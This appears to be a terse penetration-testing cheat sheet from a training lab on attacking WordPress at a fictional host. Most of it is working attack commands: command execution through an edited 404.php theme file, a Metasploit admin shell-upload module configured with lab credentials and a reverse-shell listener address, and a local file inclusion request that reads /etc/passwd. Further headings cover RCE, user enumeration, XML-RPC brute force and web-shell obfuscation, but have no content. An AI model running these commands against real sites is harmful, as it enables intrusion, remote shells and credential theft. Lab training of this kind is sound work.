2. Attacking Wordpress
1. Manual Code Execution via Theme Editor (404.php)
curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id2. Metasploit wp_admin_shell_upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username john
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password firebird1
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.14.15
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.129.42.195
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit3. mail-masta LFI Exploit
curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd4. wpDiscuz RCE Exploit
Python Script Method
Curl Method
5. WordPress REST API User Enumeration
6. XML-RPC Brute Force (system.multicall)
7. wp-config.php Exposure Check
8. Web Shell Obfuscation Example
Last updated